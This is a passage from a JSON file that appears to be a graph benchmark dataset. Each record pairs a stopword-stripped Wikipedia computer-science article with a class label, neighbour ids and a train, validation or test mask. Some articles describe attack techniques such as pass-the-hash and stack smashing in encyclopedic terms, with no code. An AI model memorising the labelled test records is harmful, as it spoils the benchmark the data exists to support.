    "text": "Mark_Kriegsman:mark kriegsman mark edwin kriegsman born 1966 american entrepreneur computer programmer inventor writer director engineering veracode lives massachusetts favorite person world daughter eleanor kriegsman writing porting open-source software 30 years founded ran pioneering software companies including document.com later acquired merrill clearway technologies acquired mirror image internet college kriegsman worked cognitive systems inc. started notable ai researcher roger schank developing large scale rule-based statistical text-processing ai systems later integrated three technologies paper wrote ieee designing document management systems interleaf led found first startup document.com founding clearway kriegsman senior developer stake later acquired symantec clearway created firesite web accelerator content delivery network early webarcher internet search tool late 1998 clearway involved early ad-blocking controversy release ad blocking web software adscreen angered user base spurred lively discussion role advertisements web publishing based user feedback clearway pulled adscreen two days later kriegsman active participant several often overlapping areas software development one founders veracode reflecting long-standing interest software security also however interested secure information sharing open-access movement outspoken skeptic sees shady business practices computer industry kriegsman fascination computers caught attention local newspaper 1979 13 lucy meyer new jersey summit herald reported mark ... likes make programs sometimes patterns sometimes short programs 'that pop head parlayed skill interest writing computer games age 15 released first game starblaster later second panic button graduated hampshire college amherst massachusetts studied cognitive science graduation kriegsman worked cognitive systems inc. later went found several successful technology companies starting document.com later including clearway veracode kriegsman descendant william bradford leader plymouth colony massachusetts well early santa fe merchants willi flora spiegelberg willi mayor santa fe 1884–1886 kriegsman holds following patents patents concerning content delivery networks systems patent concerning dynamic web page assembly caching",
    "neighbors": [
      5512,
      6665,
      10368,
      9569
    ],
    "mask": "Test"
  },
  {
    "node_id": 4550,
    "label": 9,
    "text": "Allegro_Common_Lisp:allegro common lisp allegro common lisp programming language integrated development environment ide developed franz inc dialect language lisp commercial software implementation language common lisp allegro cl provides full american national standards institute ansi common lisp standard many extensions including threads clos streams clos mop unicode ssl streams implementations various internet protocols opengl interface first version allegro common lisp finished end 1986 originally called extended common lisp allegro cl available many operating systems including microsoft windows 32/64-bit many unix unix-like 32-bit 64-bit including macos intel 32/64-bit linux 32/64-bit freebsd 32-bit solaris x64 sparc 32/64-bit unicos uts internationalization localization support based unicode supports various external text encodings provides string character types based universal coded character set 2 ucs-2 allegro cl used without integrated development environment ide available windows linux macos version 8.2 ide written allegro cl includes development tools including editor interface designer allegro cl used deliver applications allegro cl available freeware free express edition limits like constrained heap space non-commercial use customers get access much source code allegro cl allegro cl includes implementation prolog object caching database called allegrocache recent release allegro cl 10.1 supports symmetric multiprocessing allegro cl used implement various applications",
    "neighbors": [
      10752,
      11269,
      2056,
      2062,
      9231,
      7184,
      2577,
      9749,
      8728,
      4633,
      4122,
      9245,
      8226,
      2603,
      5165,
      5677,
      3119,
      3631,
      2105,
      6201,
      3132,
      6717,
      576,
      8258,
      8771,
      8262,
      1613,
      9299,
      10841,
      3675,
      2658,
      7267,
      2660,
      7269,
      8293,
      3176,
      2666,
      2667,
      5743,
      8303,
      2673,
      8304,
      5751,
      9848,
      5754,
      7292,
      7805,
      1664,
      9345,
      1666,
      1159,
      9865,
      6797,
      9877,
      3734,
      7848,
      4777,
      4779,
      5803,
      2225,
      11442,
      8883,
      692,
      7867,
      4799,
      7880,
      8908,
      205,
      5837,
      4822,
      9943,
      7896,
      9434,
      5852,
      10463,
      7392,
      7904,
      11488,
      8421,
      10470,
      11495,
      5356,
      9964,
      4846,
      5360,
      5361,
      9969,
      8435,
      10480,
      9975,
      6906,
      2304,
      4865,
      4867,
      5380,
      3334,
      6919,
      3336,
      10510,
      9491,
      1812,
      1301,
      5397,
      10012,
      3869,
      2335,
      2849,
      3876,
      11559,
      7981,
      7983,
      2352,
      10547,
      823,
      311,
      6969,
      1347,
      1348,
      11083,
      8524,
      3408,
      6994,
      1365,
      2392,
      6493,
      10083,
      6502,
      11625,
      8554,
      9579,
      5492,
      3446,
      1399,
      10104,
      377,
      4992,
      2438,
      3462,
      8582,
      7562,
      6556,
      10654,
      6047,
      1952,
      4516,
      5031,
      1448,
      5033,
      8618,
      9128,
      7616,
      5569,
      6594,
      8644,
      4550,
      7629,
      11218,
      10712,
      3034,
      479,
      3051,
      5611,
      5612,
      7670,
      11255,
      2045,
      4606
    ],
    "mask": "Test"
  },
  {
    "node_id": 4551,
    "label": 3,
    "text": "King's_Valley_II:king valley ii king valley ii seal el giza game msx1 msx2 computers konami sequel king valley 1985 msx2 version saw release japan goes rare contest version contest making levels games built-in level editor held four japanese msx magazines two msx.fan beep winners contest received gold cartridge twenty custom stages custom levels saved either disk tape levels interchangeable msx1 msx2 versions far far future inter-planetary archaeologist vick xiii makes choking discovery pyramids earth malfunctioning devices alien origin enough energy destroy earth vick switch core functions el giza game consists six pyramids wall engravings color pattern every pyramid contains 10 levels idea game collect crystals called soul stones level solving different puzzles evading killing enemies using many tools weapons available unlock exit door take next level later konami game nintendo ds reuses stage musics search secret spell sandfall egyptian area game msx 2 version game except minor changes like music remixed items backgrounds recolored",
    "neighbors": [
      10931,
      9006,
      7679
    ],
    "mask": "Test"
  },
  {
    "node_id": 4552,
    "label": 4,
    "text": "Pass_the_hash:pass hash cryptanalysis computer security pass hash hacking technique allows attacker authenticate remote server service using underlying ntlm lanman hash user password instead requiring associated plaintext password normally case example security obscurity merely kicks road moving goalposts replaces need stealing plaintext password merely stealing hash using authenticate attacker obtains valid user name user password hash values somehow using different methods tools able use information authenticate remote server service using lm ntlm authentication without need brute-force hashes obtain cleartext password required technique published attack exploits implementation weakness authentication protocol password hash remain static session session password next changed technique performed server service accepting lm ntlm authentication whether runs machine windows unix operating system systems services using ntlm authentication users passwords never sent cleartext wire instead provided requesting system like domain controller hash response challenge-response authentication scheme native windows applications ask users cleartext password call apis like lsalogonuser convert password one two hash values lm nt hashes send remote server ntlm authentication analysis mechanism shown cleartext password required complete network authentication successfully hashes needed attacker hashes user password need brute-force cleartext password simply use hash arbitrary user account harvested authenticate remote system impersonate user words attacker perspective hashes functionally equivalent original passwords generated pass hash technique originally published paul ashton 1997 consisted modified samba smb client accepted user password hashes instead cleartext passwords later versions samba third-party implementations smb ntlm protocols also included functionality implementation technique based smb stack created third-party e.g. samba others reason suffered series limitations hacker perspective including limited partial functionality smb protocol continued evolve years means third parties creating implementation smb protocol need implement changes additions protocol introduced newer versions windows smb historically reverse engineering complex time consuming means even performing ntlm authentication successfully using pass hash technique tools like samba smb client might implemented functionality attacker might want use meant difficult attack windows programs use dcom rpc also attackers restricted using third-party clients carrying attacks possible use built-in windows applications like net.exe active directory users computers tool amongst others asked attacker user enter cleartext password authenticate corresponding password hash value 2008 hernan ochoa published tool called pass-the-hash toolkit allowed 'pass hash performed natively windows allowed user name domain name password hashes cached memory local security authority changed runtime user authenticated — made possible 'pass hash using standard windows applications thereby undermine fundamental authentication mechanisms built operating system tool also introduced new technique allowed dumping password hashes cached memory lsass.exe process persistent storage disk quickly became widely used penetration testers attackers hash harvesting technique advanced previously used techniques e.g dumping local security accounts manager database sam using pwdump similar tools mainly hash values stored memory could include credentials domain users domain administrators logged machine example hashes authenticated domain users stored persistently local sam also dumped makes possible penetration tester attacker compromise whole windows domain compromising single machine member domain furthermore attack implemented instantaneously without requirement expensive computing resources carry brute force attack toolkit subsequently superseded windows credential editor extends original tool functionality operating system support antivirus vendors classify toolkit malware attacker carry pass-the-hash attack must obtain password hashes target user accounts end penetration testers attackers harvest password hashes using number different methods system using lm ntlm authentication combination communication protocol smb ftp rpc http etc risk attack exploit difficult defend due possible exploits windows applications running windows used attacker elevate privileges carry hash harvesting facilitates attack furthermore may require one machine windows domain configured correctly missing security patch attacker find way wide range penetration testing tools furthermore available automate process discovering weakness machine single defense technique thus standard defense depth practices apply – example use firewalls intrusion prevention systems 802.1x authentication ipsec antivirus software reducing number people elevated privileges pro-active security patching etc preventing windows storing cached credentials may limit attackers obtaining hashes memory usually means target account must logged machine attack executed allowing domain administrators log systems may compromised untrusted create scenario administrators hashes become targets attackers limiting domain administrator logons trusted domain controllers therefore limit opportunities attacker principle least privilege suggests least user access lua approach taken users use accounts privileges necessary complete task hand configuring systems use lm ntlm also strengthen security newer exploits able forward kerberos tickets similar way limiting scope debug privileges system may frustrate attacks inject code steal hashes memory sensitive processes restricted admin mode new windows operating system feature introduced 2014 via security bulletin 2871997 designed reduce effectiveness attack",
    "neighbors": [
      7556,
      774,
      1429,
      1941,
      3477,
      10232,
      3742,
      2213,
      8998,
      10279,
      10281,
      7228,
      3394,
      10437,
      582,
      7754,
      10442,
      6098,
      10835,
      93,
      9440,
      9569,
      2928,
      6904,
      10747,
      2558
    ],
    "mask": "None"
  },
  {
    "node_id": 4553,
    "label": 3,
    "text": "PDP-11_architecture:pdp-11 architecture pdp-11 architecture instruction set architecture isa developed digital equipment corporation dec implemented central processing units cpus microprocessors used pdp-11 minicomputers wide use 1970s eventually overshadowed powerful vax-11 architecture 1980s sixteen-bit words stored little-endian least significant bytes first thirty-two-bit data—supported extensions basic architecture e.g. floating point fpu instruction set double-words extended instruction set long data commercial instruction set —are stored one format including unusual middle-endian format sometimes referred pdp-endian pdp-11 16-bit addresses address 64 kb time pdp-11 yielded vax 8-bit bytes hexadecimal notation becoming standard industry however numeric values pdp-11 always use octal notation amount memory attached pdp-11 always stated number words basic logical address space 32k words high 4k physical address space addresses 160000 177777 absence memory management populated input/output registers bus respond addresses range originally fully loaded pdp-11 28k words processor reserves low memory addresses two-word vectors give program counter processor status word begin service routine i/o device interrupts program places address vector bus indicate service routine take control lowest vectors service routines handle various types trap traps occur program errors attempt execute undefined instruction also program executes instruction bpt emt iot trap request service operating system article pdp-11 describes 16-bit logical address space became insurmountable limitation life pdp-11 following techniques used work around limitation cpu contains eight general-purpose 16-bit registers r0 r7 register r7 program counter pc although register used stack pointer r6 stack pointer sp used hardware interrupts traps r5 often used point current procedure call frame speed context switching pdp-11 models provide dual r1-r5 register sets kernel supervisor present user modes separate memory maps also separate stack pointers user program cause system malfunction storing invalid value stack pointer register instructions allocate six bits specify operand three bits select one eight addressing modes three bits select one eight general registers use three-bit groups makes octal notation natural following sections item includes example operand would written assembly language prototypical single-operand instruction symbol opr rn means one registers written r0 r7 rn signifies contents register following eight modes applied general register effects applied r6 stack pointer sp r7 program counter pc set separately following sections index index deferred modes x 16-bit value taken second word instruction double-operand instructions operands use modes instructions three words long autoincrementation autodecrementation register 1 byte instructions 2 word instructions 2 whenever deferred mode used since quantity register addresses word pointer r7 program counter specified four addressing modes naturally yield useful effects common use absolute mode—whose syntax combines immediate deferred mode—is specify input/output registers registers device specific memory addresses relative mode simpler syntax typical referring program variables jump destinations program uses relative mode relative deferred mode exclusively internal references position-independent contains assumptions location loaded arbitrary memory location even moved need addresses adjusted reflect location relocated computing addresses relative current location processor performed relocation fly immediate absolute modes merely autoincrement autoincrement deferred mode respectively applied pc auxiliary word instruction table says pc next instruction automatically incremented past auxiliary word pc always points words autoincrementation always 2 r6 also written sp used hardware stack traps interrupts convention enforced set modes pdp-11 provides stack grows downward—toward lower addresses—as items pushed onto mode applied sp register programmer elects use software stack addressing modes following effects although software stacks contain bytes sp always stack words autoincrementation autodecrementation sp always 2 pdp-11 operates bytes words bytes specified register number—identifying register low-order byte—or memory location words specified register number memory location low-order byte must even number instructions take operands bit 15 set specify byte addressing clear specify word addressing lists following two sections assembly-language programmer appended b instruction symbol specify byte operation example mov became movb instructions example mark sob implemented pdp-11 models high-order four bits specify operation performed bit 15 generally selecting word versus byte addressing two groups six bits specify mode register defined two operands add sub instructions use word addressing byte-oriented variations additional two-operand instructions require register source operand register pair used written r r+1 first register contains low-order bits must even second register contains high-order bits remainder exception multiply instruction r may odd high 16 bits result stored high-order nine bits specify operation performed bit 15 generally selecting word versus byte addressing many operations seems combinations high-order four bits taken double-operand instructions single group six bits specifies mode register defined single operand branch instructions take conditional effect based state condition codes psw branch instruction typically preceded two-operand cmp compare bit bit test one-operand tst test instruction arithmetic logic instructions also set condition codes contrast intel processors x86 architecture mov instructions set branch instruction could used branch depending whether value moved zero negative high-order byte specifies operation bits 8 9 10 op-code bit 15 reversing branch sense low-order byte offset relative current location program counter offset number words multiplied 2 combined program counter signed number enabling branches forward backward code limited range branch instructions meant code grew target addresses branches would become unreachable programmer would change one-word br two-word jmp instruction next group jmp conditional forms programmer would change beq bne branched around jmp sob subtract one branch listed two-operand instructions another conditional branch instruction jsr instruction could save register stack programs need feature specified pc register jsr pc address routine returned using rts pc routine called instance jsr r4 address old value r4 would top stack return address jsr would r4 let routine gain access values coded in-line specifying r4 in-line pointers specifying r4 autoincrementation moved past data point caller code resumed routine would specify rts r4 return caller four condition codes processor status word psw instructions group digital called micro-programmed single bit instruction word referenced single condition code assembler define syntax specify every combination symbols scc ccc assembled instruction set cleared respectively four condition codes eis option 11/35/40 11/03 standard newer processors fis instruction set option pdp-11/35/40 11/03 optional floating point processor option 11/45 subsequent models cis implemented optional microcode 11/23/24 add-in module 11/44 one version 11/74 provided string decimal instructions used cobol dibol psw mapped memory address 177 776 instructions found earliest pdp-11s gave programs direct access register pdp-11s provided multiple instruction spaces data spaces set non-orthogonal move instructions gave access spaces example routines operating system handled run-time service calls would use instructions exchange information caller life pdp-11 subtle differences arose implementation instructions combinations addressing modes though implementation regarded correct inconsistencies affect ordinary use pdp-11 pdp-11 processor speed varied model memory configuration op code addressing modes instruction timing three components execute/fetch instruction access time source destination last two components depended addressing mode example pdp-11/70 circa 1975 instruction form add x r r n fetch/execute time 1.35 microseconds plus source destination times 0.6 microseconds total instruction time 2.55 microseconds case addressed memory cache added 1.02 microseconds register-to-register add r r n could execute cache 0.3 microseconds floating point even complex since overlap cpu floating-point processor general floating point significantly slower single-precision floating add instruction could range 2.4 5.5 microseconds plus time fetch operands pdp-11 operated priority level 0 7 declared three bits processor status word psw high-end models could operate choice modes kernel privileged user application sometimes supervisor according two bits psw request interrupt bus device would assert one four common bus lines br4 br7 processor responded higher numbers indicated greater urgency perhaps data might lost desired sector might rotate contact read/write heads unless processor responded quickly printer readiness another character lowest priority br4 would remain ready indefinitely processor operating level 5 br6 br7 would order processor operating 3 lower would grant interrupt 7 would grant none bus requests granted lost merely deferred device needing service would continue assert bus request whenever interrupt exceeded processor priority level processor asserted corresponding bus grant bg4 bg7 bus-grant lines common lines daisy chain input gate output previous gate chain gate bus device device physically closer processor earlier daisy chain device made request sensing bus-grant input could conclude control bus pass grant signal next device bus device made request propagated bus-grant input bus-grant output giving next closest device chance reply devices occupy adjacent slots processor board grant continuity cards inserted empty slots propagated bus-grant line control bus device dropped bus request placed bus memory address two-word vector processor saved program counter pc psw entered kernel mode loaded new values specified vector device br6 new psw vector would typically specify 6 new processor priority processor would honor urgent requests br7 service routine defer requests lower priority new pc processor jumped service routine interrupting device routine operated device least removing condition caused interrupt routine ended rti return interrupt instruction restored pc psw processor granted interrupt bus request made error device responded bus grant processor timed performed trap would suggest bad hardware macro-11 assembly language pdp-11 successor pal-11 program assembler loader earlier version pdp-11 assembly language without macro facilities macro-11 supported dec pdp-11 operating systems pdp-11 unix systems also include assembler called structurally similar macro-11 different syntax fewer features folk myth instruction set architecture pdp-11 influenced idiomatic use b programming language pdp-11 increment decrement addressing modes correspond codice_1 codice_2 constructs c. codice_3 codice_4 register variables expression codice_5 could compiled single machine instruction dennis ritchie says folk myth historically impossible however c programming language take advantage several low-level programming features pdp-11 resulting inclusion new processors",
    "neighbors": [
      1922,
      3142,
      5065,
      9739,
      5933,
      3630,
      5358,
      1776,
      2045,
      6063,
      3699,
      5492,
      757,
      10548,
      11604,
      7032,
      477,
      6558
    ],
    "mask": "Validation"
  },
  {
    "node_id": 4554,
    "label": 4,
    "text": "Site_Security_Handbook:site security handbook site security handbook rfc 2196 guide setting computer security policies procedures sites systems internet however information provided also useful sites yet connected internet guide lists issues factors site must consider setting policies makes number recommendations provides discussions relevant areas guide framework setting security policies procedures order effective set policies procedures site make many decisions gain agreement communicate implement policies guide product ietf ssh working group published 1997 obsoleting earlier rfc 1244 1991",
    "neighbors": [
      6162,
      5373,
      2558
    ],
    "mask": "None"
  },
  {
    "node_id": 4555,
    "label": 4,
    "text": "Alphonse_F._La_Porta:alphonse f. la porta alphonse f. la porta born january 15 1939 career member senior foreign service served u.s ambassador mongolia december 1997 november 2000 subsequently served political advisor u.s. commander-in-chief regional headquarters allied forces southern europe january 2001 november 2003 alphonse la porta born january 15 1939 brooklyn new york family moved south shore long island – first oceanside lynbrook.when young parents first generation immigrants worked hair dressers father came sicily mother ukraine child attended davison avenue elementary school malverne junior high school finally graduating malverne high school 1956 enrolled georgetown university school foreign service graduating 1960 took foreign service exam passing written portion failing score passing grade oral exams decided pursue master degree new york university 1960 1962 entered u.s. army worked army intelligence finished enlistment 1963 began pursue ph.d. georgetown university recruited work national security agency retook foreign service exam 1963–64 time passed exams entered foreign service 1965 first assignment office planning management 1967 1970 political officer chief consular section u.s. embassy jakarta indonesia position attested passport application stanley ann dunham soetoro mother president barack h. obama thus become part barack obama citizenship conspiracy theories principal officer u.s. consulate medan 1978–1981 1985 1987 la porta served state department office management operations moved deputy chief mission u.s. embassy wellington new zealand 1987 1991 amb la porta washington-based assignments included working bureau east asian pacific affairs director office cambodian genocide investigation executive assistant president special representative philippine economic reform deputy director office indonesia malaysia brunei singapore affairs becoming u.s ambassador mongolia 1997 served president vice president american foreign service association 1995 1997 ambassador la porta retired u.s. foreign service september 2003 38 years service president united states-indonesia society usindo 2004 2007 currently managing partner trans pacific partners llc tpp provides professional support military exercises pacific europe latin america serves consultant civil preparedness disaster management amb la porta graduate national war college georgetown university school foreign service 1960 new york university served commissioned officer united states army 1961 1963 speaks indonesian turkish",
    "neighbors": [
      7887
    ],
    "mask": "Validation"
  },
  {
    "node_id": 4556,
    "label": 4,
    "text": "ZMW_attack:zmw attack zmw attack hypothetical denial-of-service attack internet routing infrastructure named ying zhang z. morley mao jia wang researchers published original paper considered possibility relies using targeted denial-of-service attacks links carrying bgp connections autonomous systems attempt overwhelm routers default-free zone routing updates leading disruption forcing perform continuous route recalculations 2010 security researcher max schuchard published paper considering possibility using botnet perform zmw attack internet entire core infrastructure hypothetically allowing botnet 250,000 computers crash entire internet",
    "neighbors": [
      2409,
      4883,
      2085
    ],
    "mask": "Validation"
  },
  {
    "node_id": 4557,
    "label": 3,
    "text": "Conceptual_interoperability:conceptual interoperability conceptual interoperability concept simulation theory however broadly applicable model-based information technology domains early ideas harkrider lunceford simulation composability studied detail petty weisel formulated current working definition composability capability select assemble simulation components various combinations simulation systems satisfy specific user requirements defining characteristic composability ability combine recombine components different simulation systems different purposes recent rand study provided coherent overview state composability military simulation systems within u.s. department defense many findings much broader applicability resulting challenges produced layered views petty weisel distinguish idea interoperability coping technical challenges composability dealing modeling issues research virginia modeling analysis simulation center vmasc refined layers define levels conceptual interoperability model lcim definition undergone gradual improvement since first discussion current version lcim first documented turnitsa different levels characterized follows lcim shows layered approach support composable services necessary ws standards described earlier able manage levels particular specific upper layers worth mentioning however lcim focuses technical support information systems command control information systems military context alberts hayes point organizational social aspects often even important tolk proposes layered framework measures merits dealing questions like tactical strategic alignment objectives even political coalition partners within contribution however focus information system aspects page et al suggest defining composability realm model interoperability realm software implementation model addition research introduces integratability coping hardware-side configuration side connectivity author supports categorization recommends following distinction dealing issues simulation system interoperability include meaningful simulation-to-simulation system interoperation ideas complement lcim lcim successfully applied domain modeling simulation generally model-based interoperability challenges pointed lcim used descriptive prescriptive mode recently recommended extend lcim interoperability maturity matrix acm sigsim scs sponsored expert discussion scs spring simulation multiconference san diego ca april 11 2013 professor tolk addressed composability grand challenge modeling simulation thinking cloud-based simulation proposed following two definitions referred latest work research team utilizes model theory lcim form slight variations thereof applied simulation many domains well examples given 500 journal articles book chapters conference papers referencing lcim ideas health human sciences http //aspe.hhs.gov/sp/reports/2010/erpreqlim/report.shtml medical simulation weininger s. jaffe m.b. robkin m. rausch t. arney d. goldman j.m. 2016 importance state context safe interoperable medical systems ieee journal translational engineering health medicine 4 pp.1-10 internet things kolbe niklas jérémy robert sylvain kubler yves le traon proficient productivity tool semantic interoperability open iot ecosystem proceedings 14th eai international conference mobile ubiquitous systems computing networking services 2017 department energy smartgrid http //www.gridwiseac.org/pdfs/interopframework_v1_1.pdf enterprise interoperability geographic information systems digital library ecosystem adaptive instructional systems workshop proceedings 2nd ais standards workshop opening address understanding ais problem space dr. robert sottilare original information based tolk 2006 comes semantic web pads implications dynamic web pads pp 55–62 20th workshop principles advanced distributed simulation pads'06 http //doi.ieeecomputersociety.org/10.1109/pads.2006.39 tolk diallo sy turnitsa cd winters ls 2006 composable web services net-centric applications journal defense modeling simulation jdms volume 3 number 1 pp 27-44 january 2006 enhanced several user contributions additions since",
    "neighbors": [
      8717,
      10452,
      2948,
      7045
    ],
    "mask": "None"
  },
  {
    "node_id": 4558,
    "label": 4,
    "text": "Slowdroid:slowdroid slowdroid denial-of-service attack allows single mobile device take network server requiring minimal bandwidth attack created research purposes maurizio aiello developed enrico cambiaso ieiit institute national research council italy released android application slowdroid behavior similar slow dos attacks slowloris since creates many connections victim order saturate resources listening daemon application one difference sent payload case slowdroid compliant specific protocol instead sending forged http request endless sequence spaces sent instead characteristic makes slowdroid able target different protocols payload another difference sending data sending phase instead sending sequence characters slowloris slowdroid sends single character hence reducing bandwidth amounts finally main difference implementation slowdroid implemented executed android mobile operating system platform slowdroid initially published google play store due developers terms service application removed store currently available researchers website",
    "neighbors": [
      2018,
      10852,
      2409,
      6347,
      2060,
      5677,
      7983,
      953,
      8413,
      9727
    ],
    "mask": "None"
  },
  {
    "node_id": 4559,
    "label": 4,
    "text": "Invicta_Networks:invicta networks invicta networks computer security company founded victor sheymov former kgb officer exfiltrated moscow brought united states 1980 company products use technology shifts ip addresses company claims makes impossible hack company technology mentioned film breach film",
    "neighbors": [
      4956,
      2558
    ],
    "mask": "Test"
  },
  {
    "node_id": 4560,
    "label": 4,
    "text": "First_Department:first department first department charge secrecy political security workplace every enterprise institution soviet union dealt kind technical scientific information plants r institutions etc printing capabilities e.g. publishing houses every branch central statistical administration successor state statistics committee goskomstat also first department control access distribution publication official economic population social statistics copies especially sensitive documents numbered labeled stamped secret official use cases official use version documents mimicked public use versions format provided much detailed information first departments part kgb subordinated management enterprise institution among functions control access information considered state secret foreign travel publications first department also kept account usage copying devices xerographers printing presses typewriters etc prevent unsanctioned copying including samizdat",
    "neighbors": [],
    "mask": "Test"
  },
  {
    "node_id": 4561,
    "label": 6,
    "text": "Gzip:gzip gzip file format software application used file compression decompression program created jean-loup gailly mark adler free software replacement compress program used early unix systems intended use gnu g gnu version 0.1 first publicly released 31 october 1992 version 1.0 followed february 1993. gzip based deflate algorithm combination lz77 huffman coding deflate intended replacement lzw patent-encumbered data compression algorithms time limited usability compress popular archivers gzip often also used refer gzip file format although file format also allows multiple streams concatenated gzipped files simply decompressed concatenated originally one file gzip normally used compress single files compressed archives typically created assembling collections files single tar archive also called tarball compressing archive gzip final compressed file usually extension gzip confused zip archive format also uses deflate zip format hold collections files without external archiver less compact compressed tarballs holding data compresses files individually take advantage redundancy files solid compression various implementations program written commonly known gnu project implementation using lempel-ziv coding lz77 openbsd version gzip actually compress program support gzip format added openbsd 3.4 g specific version stands gratis freebsd dragonfly bsd netbsd use bsd-licensed implementation instead gnu version actually command-line interface zlib intended compatible gnu implementation options implementations originally come netbsd support decompression bzip2 unix pack format alternative compression program achieving 3-8 better compression zopfli achieves gzip-compatible compression using exhaustive algorithms expense compression time required affect decompression time codice_3 written mark adler compatible gzip speeds compression using available cpu cores threads tar utility included linux distributions extract .tar.gz files passing option e.g. zlib abstraction deflate algorithm library form includes support gzip file format lightweight stream format api zlib stream format deflate gzip file format standardized respectively rfc 1950 rfc 1951 rfc 1952 gzip format used http compression technique used speed sending html content world wide web one three standard formats http compression specified rfc 2616 rfc also specifies zlib format called deflate equal gzip format except gzip adds eleven bytes overhead form headers trailers still gzip format sometimes recommended zlib internet explorer implement standard correctly handle zlib format specified rfc 1950. zlib deflate used internally portable network graphics png format since late 1990s bzip2 file compression utility based block-sorting algorithm gained popularity gzip replacement produces considerably smaller files especially source code structured text cost memory processing time factor 4 advancecomp 7-zip produce gzip-compatible files using internal deflate implementation better compression ratios gzip itself—at cost processor time compared reference implementation",
    "neighbors": [
      2050,
      516,
      7702,
      8214,
      3618,
      10791,
      3114,
      1583,
      2095,
      6713,
      10817,
      5698,
      10822,
      5703,
      1098,
      3659,
      10317,
      4174,
      3674,
      1631,
      6759,
      9320,
      10857,
      1646,
      8304,
      3188,
      9844,
      119,
      9343,
      2180,
      7813,
      658,
      1172,
      1173,
      3222,
      9880,
      8863,
      4780,
      7855,
      4797,
      190,
      2755,
      7366,
      4296,
      5833,
      2762,
      722,
      3804,
      3296,
      9953,
      5858,
      10464,
      2281,
      234,
      8940,
      237,
      4845,
      5357,
      8436,
      6389,
      11509,
      6393,
      7422,
      9987,
      9988,
      5397,
      802,
      10027,
      7471,
      7983,
      4406,
      7487,
      11076,
      9029,
      1352,
      10575,
      3921,
      2389,
      4439,
      11614,
      865,
      7529,
      5482,
      4459,
      9579,
      4974,
      1394,
      5492,
      894,
      10622,
      10623,
      9090,
      7555,
      4485,
      6022,
      11654,
      10121,
      1420,
      4493,
      6028,
      7056,
      9616,
      1939,
      1940,
      2970,
      9125,
      10149,
      5555,
      8627,
      950,
      6587,
      9148,
      10687,
      965,
      5067,
      8147,
      9177,
      2010,
      9178,
      8675,
      8676,
      5096,
      10732,
      5107,
      7667,
      5110,
      4089,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 4562,
    "label": 4,
    "text": "Stack_buffer_overflow:stack buffer overflow software stack buffer overflow stack buffer overrun occurs program writes memory address program call stack outside intended data structure usually fixed-length buffer stack buffer overflow bugs caused program writes data buffer located stack actually allocated buffer almost always results corruption adjacent data stack cases overflow triggered mistake often cause program crash operate incorrectly stack buffer overflow type general programming malfunction known buffer overflow buffer overrun overfilling buffer stack likely derail program execution overfilling buffer heap stack contains return addresses active function calls stack buffer overflow caused deliberately part attack known stack smashing affected program running special privileges accepts data untrusted network hosts e.g webserver bug potential security vulnerability stack buffer filled data supplied untrusted user user corrupt stack way inject executable code running program take control process one oldest reliable methods attackers gain unauthorized access computer canonical method exploiting stack-based buffer overflow overwrite function return address pointer attacker-controlled data usually stack illustrated codice_1 following example code takes argument command line copies local stack variable codice_2 works fine command-line arguments smaller 12 characters see figure b arguments larger 11 characters long result corruption stack maximum number characters safe one less size buffer c programming language strings terminated null byte character twelve-character input thus requires thirteen bytes store input followed sentinel zero byte zero byte ends overwriting memory location one byte beyond end buffer program stack codice_3 various inputs notice figure c argument larger 11 bytes supplied command line codice_3 overwrites local stack data saved frame pointer importantly return address codice_3 returns pops return address stack jumps address i.e starts executing instructions address thus attacker overwritten return address pointer stack buffer codice_6 contains attacker-supplied data actual stack buffer overflow exploit string would instead shellcode suitable platform desired function program special privileges e.g suid bit set run superuser attacker could use vulnerability gain superuser privileges affected machine attacker also modify internal variable values exploit bugs example number platforms subtle differences implementation call stack affect way stack buffer overflow exploit work machine architectures store top-level return address call stack register means overwritten return address used later unwinding call stack another example machine-specific detail affect choice exploitation techniques fact risc-style machine architectures allow unaligned access memory combined fixed length machine opcodes machine limitation make jump esp technique almost impossible implement one exception program actually contains unlikely code explicitly jump stack register within topic stack buffer overflows often-discussed-but-rarely-seen architecture one stack grows opposite direction change architecture frequently suggested solution stack buffer overflow problem overflow stack buffer occurs within stack frame overwrite return pointer investigation claimed protection finds naïve solution best overflow occurs buffer previous stack frame still overwrite return pointer allow malicious exploitation bug instance example return pointer codice_7 overwritten overflow actually occurs within stack frame codice_8 however buffer overflows call codice_8 resides previous stack frame return pointer codice_8 numerically higher memory address buffer means instead return pointer codice_7 overwritten return pointer codice_8 overwritten means growing stack opposite direction change details stack buffer overflows exploitable reduce significantly number exploitable bugs years number control-flow integrity schemes developed inhibit malicious stack buffer overflow exploitation may usually classified three categories stack canaries named analogy canary coal mine used detect stack buffer overflow execution malicious code occur method works placing small integer value randomly chosen program start memory stack return pointer buffer overflows overwrite memory lower higher memory addresses order overwrite return pointer thus take control process canary value must also overwritten value checked make sure changed routine uses return pointer stack technique greatly increase difficulty exploiting stack buffer overflow forces attacker gain control instruction pointer non-traditional means corrupting important variables stack another approach preventing stack buffer overflow exploitation enforce memory policy stack memory region disallows execution stack w^x write xor execute means order execute shellcode stack attacker must either find way disable execution protection memory find way put her/his shellcode payload non-protected region memory method becoming popular hardware support no-execute flag available desktop processors method definitely makes canonical approach stack buffer overflow exploitation fail without problems first common find ways store shellcode unprotected memory regions like heap little need change way exploitation even ways damning so-called return libc method shellcode creation attack malicious payload load stack shellcode proper call stack execution vectored chain standard library calls usually effect disabling memory execute protections allowing shellcode run normal works execution never actually vectors stack variant return-to-libc return-oriented programming rop sets series return addresses executes small sequence cherry-picked machine instructions within existing program code system libraries sequence ends return so-called gadgets accomplish simple register manipulation similar execution returning stringing together achieves attacker ends even possible use returnless return-oriented programming exploiting instructions groups instructions behave much like return instruction instead separating code data another mitigation technique introduce randomization memory space executing program since attacker needs determine executable code used resides either executable payload provided executable stack one constructed using code reuse ret2libc return-oriented programming rop randomizing memory layout concept prevent attacker knowing code however implementations typically randomize everything usually executable loaded fixed address hence even aslr address space layout randomization combined nonexecutable stack attacker use fixed region memory therefore programs compiled pie position-independent executables even region memory randomized entropy randomization different implementation implementation low enough entropy problem terms brute forcing memory space randomized",
    "neighbors": [
      642,
      8066,
      5636,
      3473,
      1554,
      3603,
      1304,
      1820,
      9244,
      161,
      7717,
      10024,
      9854,
      815,
      5040,
      435,
      10933,
      7734,
      5176,
      700,
      2878,
      2367,
      1474,
      1094,
      5065,
      1103,
      4956,
      6754,
      7139,
      11106,
      9317,
      4582,
      4071,
      8167,
      10344,
      10727,
      5492,
      3704,
      2558
    ],
    "mask": "Train"
  },
  {
    "node_id": 4563,
    "label": 6,
